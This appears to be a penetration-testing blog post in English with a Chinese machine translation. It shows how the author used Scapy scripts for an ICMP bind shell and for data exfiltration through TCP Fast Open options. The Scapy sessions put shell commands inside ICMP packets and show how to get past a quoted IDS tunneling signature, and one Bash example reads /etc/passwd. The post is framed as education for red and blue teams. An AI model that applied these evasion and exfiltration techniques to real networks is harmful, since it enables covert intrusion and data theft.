scapy http协议
As the penetration testing landscape evolves and morphs; everyone seems to be “hot and heavy” on app-based testing, whether this be fuzzing a thick client or an API. One of the key things I’ve found with many clients is that they’ve gone “soft” on proper insider threat hygiene starting with network security basics. In this article, I’ll run through (2) scripts that I’ve made in Python using Scapy’s framework that can help out in many use cases: red team tunneling, purple team IOC’s, and general defender foundations. Let’s get the housekeeping out of the way:
随着渗透测试环境的发展和变化; 无论是在胖客户端还是API上模糊测试,每个人似乎都对基于应用程序的测试感到“忙碌”。 我在许多客户端上发现的关键问题之一是,他们从网络安全基础开始,在适当的内部威胁卫生方面变得“软”。 在本文中,我将介绍使用Scapy框架在Python中创建的 (2)个脚本,这些脚本可以在许多用例中提供帮助:红色团队隧道,紫色团队IOC和常规后卫基础。 让我们摆脱家政:
*Disclaimer* — The tools and methodologies shown in this article are for security enhancement needs, education, and experimental use. Do not run or perform any illegal, unethical, or otherwise troublesome activities that violate policies, compliance requirements, or legislation locally or internationally.
*免责声明*-本文中显示的工具和方法适用于安全性增强需求,培训和实验用途。 请勿在本地或国际范围内进行或执行任何违反政策,合规性要求或法规的非法,不道德或其他麻烦的活动。
Why this article?: Many newer security professionals in the field start rolling their eyes, followed with deep heavy groans when I still teach red and blue teams diligence in the network security fundamentals as well. No matter what your stance on where penetration testing, red teaming, and general security ops defense tactics are going; there is no denying that the foundations almost never change. In a recent client facing engagement; a colleague (Michael LaSalvia) and myself were tasked with an on-site pen test engagement (very rare in today’s remote ‘only’ focused type of run of the mill testing). What we found were some oversights at the network security level that our existing toolsets, and rapid Googling just did not provide. So we had to turn to making our own toolsets. This is not a full blown article on how to use Scapy, but some to show case some extended cases for using it during a pen test.
为什么写这篇文章?:该领域的许多新安全专家开始睁大眼睛,紧接着我还教红色和蓝色团队勤奋学习网络安全基础知识时,deep吟不已。 无论您对渗透测试,红队和一般安全行动防御策略的发展方向持何种立场; 无可否认,基础几乎永远不会改变。 在最近面对订婚的客户中; 一位同事( 迈克尔·拉萨尔维亚 ( Michael LaSalvia ))和我的任务是进行现场笔测试(在如今的偏远的“仅”集中式工厂测试运行中非常罕见)。 我们发现的是我们现有工具集和快速Googling所没有提供的一些网络安全级别的监督。 因此,我们不得不转向制作自己的工具集。 这不是有关如何使用Scapy的完整文章,而是一些案例,以期在笔测试过程中扩展使用Scapy的案例。
What did we find exactly?: The lowly ICMP echo/responses were able to be sent and received with lots nice error details for recon and mapping from a lower security trust zone to a higher trust zone that typically would not have access. We also discovered that despite some best in class vendor IPS firewalls between varying trust zones heavy focus on content signatures, we were able to use “old school” tunneling for ICMP, and TCP using TCP options, particularly “TCP Fast Open” (TFO). TFO, known by its other term “TCP SYN cookies” which aide in helping to track and reduce Denial of Service attacks and potentially ‘speed’ up web servers by allowing data to be received on a SYN initiated session early on before the hand shake. There were a multitude of other findings we had for this client; but we’re going to focus on these two very practical and easy to test use cases for Scapy and Python.
我们究竟找到了什么?:能够发送和接收低ICMP回显/响应,并带有很多不错的错误详细信息,以便进行侦查以及从较低安全信任区到通常没有访问权限的较高信任区的映射。 我们还发现,尽管在不同信任区域之间有一些同类最佳的供应商IPS防火墙,但它们都非常关注内容签名,但我们仍然能够对ICMP使用“老派”隧道,并使用TCP选项(特别是“ TCP Fast Open ”(TFO))使用TCP 。 TFO,以其另一个术语“ TCP SYN cookie”着称,它通过允许在握手之前及早通过SYN启动的会话上接收数据,帮助跟踪和减少“拒绝服务”攻击并可能“加速” Web服务器。 我们为该客户还有许多其他发现; 但是我们将专注于这两个非常实用且易于测试的Scapy和Python用例。
When to use Scapy when there are other tools?: Using scapy is very extendable and so much more useful than meets the eye from a basic send/receive spoofed one-off packets or port checks that you know Nmap, Hping3, Netcat, and Powershell cmdlets like Test-NetConnection can do. Well, the interesting thing about all of these are they do better when you’re operating on a service listening at Layer 4 and above; e.g. ports. In our own situations and testing — we found that we could still funnel data in and out of the network even without having access to a port to shovel shell on. Now, there are other tools such as the famous ptunnel and forks of it. But finding a modern binary pre-compiled without laced malware that will unfortunately work on Windows is difficult at best. Not to mention, that tool really makes its best use with an external listener/proxy — which we had limited access to and lots of north/south visibility on the IPS and Web Content filtering. We also had NAC in the way profiling our hosts and not giving any IP’s out to any non-Windows hosts. Fun. Scapy does great in times of need when:
什么时候可以使用Scapy(还有其他工具)?:使用scapy具有很好的可扩展性,它比您知道Nmap,Hping3,Netcat和Powershell的基本发送/接收欺骗性一次性数据包或端口检查所带来的视觉效果更加有用。像T est-NetConnection这样的cmdlet可以做到。 好吧,关于所有这些的有趣的事情是,当您在侦听第4层及更高层的服务上运行时,它们的性能会更好。 例如港口 。 在我们自己的情况和测试中,我们发现即使无需访问端口即可打开外壳,我们仍然可以将数据漏入网络或从网络中漏出。 现在,还有其他工具,例如著名的ptunnel和fork。 但是,要找到一种现代的二进制文件,而无需编译复杂的恶意软件,而不幸的是,这种二进制文件很难在Windows上运行,这是很难的。 更不用说,该工具确实可以与外部侦听器/代理一起最佳地使用它-我们对IPS和Web内容过滤的访问权限有限,并且具有南北向可视性。 我们还使用NAC来分析主机,而不向任何非Windows主机提供任何IP。 好玩 在以下情况下,Scapy在需要时表现出色:
- You need to have tools semi-portable between Windows and Linux using a mutual usually common trusted language like Python 您需要使用通常常用的共同信任语言(例如Python)在Windows和Linux之间半移植的工具
- When you need to perform actions on a per-packet-basis 当您需要基于每个数据包执行操作时
- When other tools fail or don’t work right at the network level for mangling and transforms, e.g. Ettercap/Bettercap scripts (MiTM changing content/links) 当其他工具失败或无法在网络级别正确地进行篡改和转换时,例如Ettercap / Bettercap脚本(MiTM更改内容/链接)
- When you need to make very specific noise on the network and need to have full control of the payload going out from your interface (you might only get one chance depending on the blue team’s defenses!) 当您需要在网络上发出非常特定的噪声并且需要完全控制从接口发出的有效负载时(根据蓝队的防御,您可能只有一次机会!)
The setup so far: If you’ve been following closely; let’s think through what we do have in our arsenal:
到目前为止的设置:如果您一直在密切关注; 让我们仔细考虑一下我们军械库中的装备:
- ICMP echo requests/responses (nothing else) and TCP option allowable protocol features to traverse different context network security zones. We’re also limited egress wise and between network zones on specific ports that can be traversed to. ICMP回显请求/响应(仅此而已)和TCP选项允许的协议功能可遍历不同的上下文网络安全区域。 我们在出口方面以及在可以遍历的特定端口上的网络区域之间也受到限制。
- Limited access to the network as a whole due to NAC profiling for OS and other components with soft agents. So we’re stuck with having to use Windows boxes for this particular segment of the test. 由于对OS和其他带有软代理的组件进行了NAC分析,因此对整个网络的访问受到限制。 因此,我们在测试的这一特定部分不得不使用Windows机器。
- The higher security zone holds corporate employees and other fun items. The lower security zone of the network allows for general visitors to gain Internet access for basic surfing, email, and social media. 较高的安全区域可容纳公司员工和其他娱乐物品。 网络的较低安全区域允许一般访问者获得基本的冲浪,电子邮件和社交媒体的Internet访问权限。
Yawn! Get to the good stuff: Introducing some quick scripts created by yours truly — ICMP-bindshell and TCPOptionsDataExfil both made in Python 3.x using the Scapy framework and Windows 10 friendly.
打哈欠! 掌握好东西:真正介绍一些由您自己创建的快速脚本-ICMP-bindshell和TCPOptionsDataExfil都使用Scapy框架和Windows 10友好版本在Python 3.x中制作。
ICMP-Bindshell is essentially just a listener that you can send commands to it and it’ll run on the target or victim host. Why use this? Well, in our case we had icmp access not from the higher trusted zone -> lower trusted zone. But the actual reverse — a lower trusted zone could ICMP ping and get responses including port and host prohibited administrative messages to the higher trusted zone. We assume this was an oversight; but it was a blessing for us. We could now map out the network and figure out what ports might be open and listening on endpoint hosts versus those blocked by the IPS or firewall. This is perfect when for an insider threat or a drop-in device to set in a higher-trusted zone and allow for guest traffic to pivot or use that host as anything they really want. ICMP tunneling when properly combined with denying the echo replies can keep traffic under the radar. There are times where you may want to allow certain payloads as a buffer prefix or to allow echo replies so that an IPS might understand that it isn’t tunneling because it saw the echo request and response when you spoof the sequence ID numbers.
ICMP-Bindshell本质上只是一个侦听器,您可以向其发送命令,并且它将在目标主机或受害者主机上运行。 为什么要使用这个? 好吧,在我们的案例中,我们无法从较高信任区->较低信任区进行icmp访问。 但是实际情况却相反-较低的受信任区域可以对ICMP进行ping操作,并将响应(包括端口和主机禁止的管理消息)发送到较高的受信任区域。 我们认为这是一个疏忽; 但这对我们来说是一种祝福。 现在,我们可以规划网络并找出哪些端口可以打开并在端点主机上侦听,而不是在IPS或防火墙阻止的端口上侦听。 当内部威胁或可插入设备放置在更高信任的区域中并允许访客流量以他们真正想要的方式旋转或使用该主机时,这是完美的选择。 如果将ICMP隧道与拒绝回声回复正确组合在一起,可以将流量保持在雷达之下。 有时候,您可能希望允许某些有效负载作为缓冲区前缀或允许回显答复,以便IPS可能会理解它不是在建立隧道,因为当您欺骗序列ID号时,它会看到回显请求和响应。
For example, windows ping by default will use the following string “abcdefghijklmnopqrstuvwabcdefghi” (capture partially redacted so it can align easily):
例如,Windows ping默认情况下将使用以下字符串“ abcdefghijklmnopqrstuvwabcdefghi”(部分编辑了捕获,以便可以轻松对齐):
0020 00 00 00 00 00 00 00 00 91 61 62 63 64 65 66 .2..T.....abcdef
0030 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 ghijklmnopqrstuv
0040 77 61 62 63 64 65 66 67 68 69By default, if you’re building a single one-off packet you’re going to be doing something like this (even in Windows). Once you have Python and scapy installed open up your cmd.exe prompt into Scapy interactive mode and feel free to follow along. Note: We’re using Windows 10 with Scapy 2.4.x from the ‘pip install scapy’ use AFTER you install Python 3.x 64 bit. So let’s take a look at our first Scapy packet emulating an ICMP ping (echo request)
默认情况下,如果您要构建一个一次性数据包,则将执行类似的操作(即使在Windows中也是如此)。 安装Python和scapy后,将cmd.exe提示符打开到Scapy交互模式,然后随时进行后续操作。 注意:在安装Python 3.x 64位之后,我们将Windows 10与Scapy 2.4.x从“ pip install scapy”一起使用。 因此,让我们看一下第一个模拟ICMP ping(回显请求)的Scapy数据包。
>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |>>
>>> sr1(sendpkt)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=28 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fd7 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>
>>>Note that we’re building a basic easy header with basic information. Scapy does the rest at the lower levels using our MAC addresses, Same Source IP. So, to keep this in mind, nothing was spoofed. The example here uses “8.8.8.8” which is one of Google’s DNS servers open to the public. Notice our meta-summary information there’s basic padding and the interesting thing we see is our default TTL is different, much closer to 64 initially vs. the standard 128 for Windows. There’s also, as you can see — no payload! You can verify this by running the ls(sendpkt) command. The ls() function will take your packet’s name that we just assigned “sendpkt”. Looks nothing like a Windows ping/response at all.
请注意,我们正在使用基本信息构建基本的easy标头。 Scapy使用我们的MAC地址Same Source IP在较低级别上完成其余工作。 因此,要记住这一点,没有欺骗任何东西。 这里的示例使用“ 8.8.8.8”,这是Google向公众开放的DNS服务器之一。 注意,我们的元摘要信息有基本的填充,有趣的是我们的默认TTL不同,与Windows的标准128相比,初始TTL更接近64。 如您所见,还有-没有有效载荷! 您可以通过运行ls(sendpkt)命令来验证这一点。 ls()函数将采用我们刚刚分配的“ sendpkt”的数据包名称。 看起来根本不像Windows ping /响应。
That’s one thing to keep in mind with any ICMP tunneling — use your discretion on how you wish to evade any tunneling detection depending on the controls you may have already emulated, guessed, or you can even self-test these using Snort, Suricata, or other tools listening on the same interface as your malicious traffic.
这是任何ICMP隧道都要牢记的一件事-根据您可能已经模拟,猜测的控件,使用自己的判断力来逃避任何隧道检测,或者甚至可以使用Snort,Suricata或其他工具在与您的恶意流量相同的界面上进行监听。
So, with the basic evasion “gotcha” out of the way. Let’s go ahead and use the ICMP Bind Shell script. Feel free to run it on your own. The there is only (1) script and it is set as the “listener”. This is the victim where you want to ‘reach out to’ and run shell commands on. In our case, this was a higher zoned insider threat host that can be pivoted from a lower trusted zone. Let’s build the command or packet that we wish to use in the clear.
因此,有了基本规避“陷阱”,就可以了。 让我们继续使用ICMP Bind Shell脚本。 随意自行运行。 只有(1)个脚本,它被设置为“侦听器”。 这是您要“伸出援手”并运行shell命令的受害者。 在我们的案例中,这是一个较高区域的内部威胁主机,可以从较低信任区域进行透视。 让我们构建我们希望使用的命令或数据包。
**Note on evasion: I did not build in any form of encryption or encoding. Feel free to make your own extension to my base function to decode/decrypt if you don’t want to get any standard clear-text signature content caught in an IPS. To demonstrate this problem, observe the following:
**关于回避的注意事项:我没有以任何形式的加密或编码进行构建。 如果您不想在IPS中捕获任何标准的纯文本签名内容,请随意对我的基本函数进行扩展,以进行解码/解密 。 若要演示此问题,请注意以下事项:
>>> command="whoami"
>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)/Raw(load=command)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |<Raw load='whoami' |>>>
>>>We’ve crafted a raw standard ASCII payload and attached it to our packet. Great, let’s send it at L3 so Scapy sets all the default fields so it doesn’t get dropped immediately at the stack — but oh no, we’re immediately blocked by our own north/south IPS and its apparently in the logs:
我们精心制作了原始的标准ASCII负载并将其附加到我们的数据包中。 太好了,让我们在L3处发送它,以便Scapy设置所有默认字段,这样它就不会立即被丢弃在堆栈中-但是,哦,不,我们立即被我们自己的北/南IPS及其显然在日志中阻止了:
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |<Raw load='whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=34 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fd1 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0xabcc id=0x0 seq=0x0 |<Raw load='whoami' |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
..........
Received 10 packets, got 0 answers, remaining 1 packets
>>>So we examine that we use sr1 to send and receive an answer. 1 packet got through and then when we run it again, we’re shut off.
因此,我们检查了是否使用sr1发送和接收答案。 1个数据包通过,然后再次运行时,我们被关闭了。
ET TROJAN Possible ICMP Backdoor Tunnel Command - whoami - 03/15/2020-06:38:10alert icmp any any -> any any (msg:"ET TROJAN Possible ICMP Backdoor Tunnel Command - whoami"; itype:8; icode:0; content:"whoami"; depth:6; nocase; metadata: former_category TROJAN; reference:url,www.hackingarticles.in/command-and-control-tunnelling-via-icmp; classtype:trojan-activity; sid:2027763; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, signature_severity Major, created_at 2019_07_29, performance_impact Moderate, updated_at 2019_07_29;)When examining the rule it’s looking for that content within a max depth of 6 bytes in the payload. While ICMP-bindshell tool will not do this for you (doesn’t mean you can’t build it in yourself!) You can always modify your original payload of “whoami” by adding extra meta characters such as the null “\x00” or even better, mask it as “abcdefghijklmnopqrstuvwabcdefghi” as a prefix prior to your ‘actual’ payload and you may have another way of bypassing a basic signature, assuming pre-processors don’t kick in. So your new payload might look like the following:
在检查规则时,它将在有效负载中最大6字节的深度内寻找该内容。 尽管ICMP-bindshell工具不会为您完成此操作(并不意味着您无法在自己中构建它!)您始终可以通过添加额外的元字符(例如空“ \ x00”)来修改原始的“ whoami”有效负载。甚至更好的做法是,将其掩盖为“实际”有效负载之前的前缀作为“ abcdefghijklmnopqrstuvwabcdefghi”作为前缀,并且假设预处理器没有插入,您可能还有另一种绕过基本签名的方式。因此,您的新有效负载可能看起来像以下:
>>> command
'whoami'
>>> command = "abcdefghijklmnopqrstuvwabcdefghi" + " whoami"
>>> command
'abcdefghijklmnopqrstuvwabcdefghi whoami'
>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)/Raw(load=command)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=67 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fb0 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0x208 id=0x0 seq=0x0 |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=67 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fb0 src=8.8.8.8 dst=10.10.10.10|<ICMP type=echo-reply code=0 chksum=0x208 id=0x0 seq=0x0 |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>>Now we’re getting somewhere. Our north/south IPS doesn’t block us because we appended the famous windows string in front. Now it’s your turn; feel free to experiment with the ICMP-bindshell tool and get tunneling!
现在我们到了某个地方。 我们的北/南IPS不会阻止我们,因为我们在前面附加了著名的Windows字符串。 现在轮到你了; 随时尝试使用ICMP-bindshell工具并获得隧道!
What next?: Next up, we have TCPOptionsDataExfil which isn’t so much shell code (although you could turn it into a C2 channel if you so desire or extend). This tool has a client (sender) and a listener (receiver). I’ve made them interactive so you can just worry about using the tool and seeing how the TFO feature can be used for tunneling data or shell out to a malicious regardless if the malicious host has a port open or not. Now remember, the firewall or egress policy still requires you to actually get a route ‘OUT’ to the host. But you don’t have to expose yourself using a traditional metasploit multi/handler and begin port forwarding everything. You can rely on BPF rules that you can set yourself in the tool for lockdown.
接下来是什么?:接下来,我们有了TCPOptionsDataExfil ,它不是太多的shell代码(尽管如果您愿意或可以扩展,也可以将其转换为C2通道)。 该工具具有一个客户端(发送者)和一个侦听器(接收者)。 我已经使它们具有交互性,因此您可以担心使用该工具,以及看看TFO功能如何用于通过隧道将数据或外壳发送给恶意软件, 无论恶意主机是否打开了端口 。 现在请记住,防火墙或出口策略仍然需要您实际获得通往主机的路由“ OUT”。 但是您不必使用传统的metasploit多重/处理程序来暴露自己,也不必开始进行端口转发。 您可以依靠BPF规则,可以在工具中设置自己进行锁定。
In our case, we used it (*a private extended version of the one I’ve made public, sorry script kiddies :-) ) to tunnel data out and C2 as an alternate channel since the lower trusted security zone still goes through a web content filter. We spun up common instances of our listener on services such as Google Cloud Platform (GCP), Azure, and Amazon EC2 as those are commonly trusted FQDN’s and IP’s usually whitelisted for today’s modern hybrid network. So, with the same python and scapy combo we fired up TCPfastcookie_listener.py out in our VPS and then setup the TCPfastcookie_dataexfil.py script exfil our data (in the clear for the public edition) using ONLY a TCP option. We did add an extra “null” “\0x00” byte at the payload towards the end just to give it something more than a 0 byte payload.
在我们的例子中,我们使用它(*是我公开的私有扩展版本,抱歉,脚本小子:-))将数据隧道传输出去,并将C2作为备用通道,因为较低的受信任安全区域仍然通过网络内容过滤器。 我们在诸如Google Cloud Platform(GCP),Azure和Amazon EC2之类的服务上启用了侦听器的常见实例,因为它们通常是当今现代混合网络中公认的FQDN和IP白名单。 因此,使用相同的python和scapy组合,我们在VPS中启动了TCPfastcookie_listener.py ,然后设置TCPfastcookie_dataexfil.py脚本仅使用TCP选项来泄漏我们的数据(对于公共版本而言是明确的)。 我们确实在有效负载的末尾添加了一个额外的“空”“ \ 0x00”字节,只是为了给它提供大于0字节的有效负载。
In the interactive session screens below you can see that we use basic test data and have played around with the Scapy tuple requirements in how Python sets up and uses lists for TCP Options.
在下面的交互式会话屏幕中,您可以看到我们使用了基本的测试数据,并且在Python如何设置和使用TCP选项列表中遵循了Scapy元组的要求。
I won’t waste time explaining how you should use the server/client. It’s interactive, follow the readme and you should be fine. The screenshot is fairly self explanatory; using TCP syn cookies to closed port of 8000 we were able to send the data stream we wanted out and of course in Python, redirecting standard out in an interactive session is more irritating than a standard “>> /tmp/foo.txt” shell script. The file is appending to the system path you define when you run the tool.
我不会浪费时间解释如何使用服务器/客户端。 它是交互式的,请遵循自述文件,您应该会很好。 屏幕截图很容易说明。 使用TCP syn cookie到封闭的8000端口,我们能够发送我们想要的数据流,当然也可以使用Python,在交互式会话中将标准重定向出去比标准的“ >> /tmp/foo.txt”外壳更令人讨厌脚本。 该文件将追加到您在运行该工具时定义的系统路径。
Thanks for the scripts — but I still can’t use Scapy for more than the interactive session. What features are you finding useful or Python constructs would help me? — This is probably the hardest part of any engineer. You’re going to have to build your needs on the fly in some cases. But here are some helpful points to help you maximize your usage of Scapy beyond sending a couple of packets:
感谢您的脚本,但我不能仅将Scapy用于交互式会话。 您发现什么功能有用,或者Python构造会帮助我? —这可能是任何工程师中最难的部分。 在某些情况下,您将不得不即时建立自己的需求。 但是这里有一些有用的要点,可以帮助您在发送几个数据包之外,最大限度地利用Scapy:
When using the sniff() function — you can combine it with the “prn=” argument. This allows you to create your own function in Python that scapy calls on a per packet basis. Combine it with the filter argument and the count argument and you can really control what traverses the wire including mangling and man-in-the-middle applications as some of you might’ve seen in the GXPN (SEC 660)
使用sniff()函数时-您可以将其与“ prn =”参数结合使用。 这样,您就可以在Python中创建自己的函数,从而在每个数据包的基础上简化调用。 将其与filter参数和count参数结合使用,您就可以真正控制遍历导线的对象,包括mangling和中间人应用程序,就像您在GXPN (SEC 660)中看到的那样
If you’re new to Python, I recommend starting with 3.x because it enforces more ‘structure’ and is the new long term support standard. For your basic loops and conditional statements; nothing really changes. One of the things I had a hard time dealing with is the Python constructs and how people ‘named’ things in their varying scripts. One thing to consider is that you can assign any object a “value”. That value is like the ‘back tick’ of executing a shell command inside a variable like Bash e.g. $foo = `cat /etc/passwd` , and if you echo $foo it should give you the content results. This is the same in Python, esp. when you use Scapy’s functions e.g. (send, sendp, sr1, sr0, etc.) Once you set that ans, unans = sr1(blah blah) — it’s going to execute it. So don’t set any objects in interactive mode unless you’re ready for it to execute and obtain the value instantly. Also remember, that indention hierarchy are a must for all conditional statements, functions, and loops.
如果您是Python的新手,我建议从3.x开始,因为它强制执行更多的“结构”,并且是新的长期支持标准。 对于您的基本循环和条件语句; 没有什么真正的改变。 我很难处理的一件事是Python构造以及人们如何在不同的脚本中“命名”事物。 要考虑的一件事是,您可以为任何对象分配一个“值”。 该值就像在Bash这样的变量中执行shell命令的“后退标记”,例如$ foo =`cat / etc / passwd`,如果您回显$ foo,它应该为您提供内容结果。 这在Python中尤其如此。 当您使用Scapy的功能(例如,发送,sendp,sr1,sr0等)时,一旦设置了ans,unans = sr1(blah blah)—将执行它。 因此,除非您准备让它立即执行并立即获取值,否则请不要在交互模式下设置任何对象。 还要记住,缩进层次结构对于所有条件语句,函数和循环都是必须的。
Another Python tip is how people define functions. You don’t have to be a math wizard to create a function. A function can have multiple functions nested inside like our tools, and combined with if/else conditional statements. Remember that the order of variables visible to each function is based on top-down hierarchy scope if you’re thinking about it from a start to stop script. Programmers will hate me for using that analogy and definition as there’s local, global, etc. But it just makes easier to understand for general “script” minded people. Next, often you’ll see a “return” statement or not with a function. A return statement simple gives you back a value at the end of the execution of that function. So if you want the function to give you some output into a variable after you call the function you use a return statement. For example:
Python的另一个技巧是人们如何定义函数。 您不必是数学向导即可创建函数。 一个函数可以像我们的工具一样嵌套多个函数,并与if / else条件语句结合使用。 请记住,如果您从头到尾地考虑脚本,则每个函数可见的变量顺序基于自上而下的层次结构范围。 程序员会讨厌我在本地,全局等地方使用这种类比和定义。但这对于一般“脚本”头脑的人来说更容易理解。 接下来,通常您会看到“ return”语句或不包含函数。 一个简单的return语句在该函数执行结束时为您提供一个值。 因此,如果您希望函数在调用函数后 为变量提供一些输出, 则可以使用return语句 。 例如:
#Python my first function example>>> nslookup 8.8.8.8
File "<stdin>", line 1
nslookup 8.8.8.8
^
SyntaxError: invalid syntax#uh oh, can't directly make a external program call easily hmm...#lets use a function so I can get on with my day and 'cheat' using external calls while scripting other stuff in Pythonimport os, sys>>> os.system("nslookup 8.8.8.8")
Server: dns.scissecurity.com
Address: 10.10.10.1Name: dns.googleAddress: 8.8.8.80
>>>#Hey now we're getting somewhere! That was annoying to type and I don't just want to lookup DNS, I it to also ping and tell me what my host IP was again in the return. Here we go!
#default libraries import in Python natively
import os,sys
#lets grab something interactively from user and make it a string type
hostinput = str(input("put in an IP or FQDN: "))
#create our own function and only return the value of calcfoo
def chowrecon(arg1):
os.system("nslookup" + ' ' + arg1)
os.system("ping" + ' ' + arg1)
calcfoo = ("return something to stdout: " + arg1)
return calcfoo
#run the function and assign it to a variable
foo = chowrecon(hostinput)
#you've got to print the returned value
print(foo)*Note: I’ve setup the function is a very particular way. Notice how it only returned ONE output. You can only specify one argument/variable that the function is supposed to run. If you also notice closely, return is only capturing my echo of ‘return something to standard out with the hostname after the function is finished running. This is important to note that os.system did not return the values of the function to the original caller. OS.System by default uses standard out and that’s it. If you need it redirected elsewhere you need to use something like check_output or os.popen. Popen() is more forgiving than check_output() as an error raised via check_output() will stop the Python script and Popen() does not.
*注意:我设置的功能是一种非常特殊的方法。 注意它仅返回一个输出。 您只能指定该函数应该运行的一个参数/变量。 如果您还密切注意,return只是捕获了我的回声,即函数完成运行后,将主机名返回标准。 重要的是要注意os.system没有将函数的值返回给原始调用者。 OS.System默认使用标准输出,仅此而已。 如果需要将其重定向到其他位置,则需要使用诸如check_output或os.popen之类的东西。 Popen()比check_output()更宽容,因为通过check_output()引发的错误将停止Python脚本,而Popen()不会。
Summary:
摘要:
I hope you enjoyed seeing the use cases of Scapy and Python to maximize your ROI during a pen test engagement or whichever sec ops function you decide to pursue. While I enjoyed my weekend project of creating these scripts and tutorials. I’m still more of a Powershell fan and only wish Scapy ported to PowerShell (perhaps one day).
我希望您喜欢在笔测试或您决定采用的任何秒操作功能时,看到Scapy和Python的用例来最大化您的ROI。 当我享受我的周末项目创建这些脚本和教程时。 我仍然更喜欢Powershell风扇,只希望Scapy移植到PowerShell(也许有一天)。
Drop me a line and let me know what you thought of this article and the tools!
请给我讲一行,让我知道您对本文和工具的看法!
Dennis Chow, MBA GXPN, GREM, CISSP
丹尼斯·周(Dennis Chow),MBA GXPN,GREM,CISSP
Chief Information Security Officer of SCIS Security
SCIS Security的 首席信息安全官
scapy http协议
扫一扫
959
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
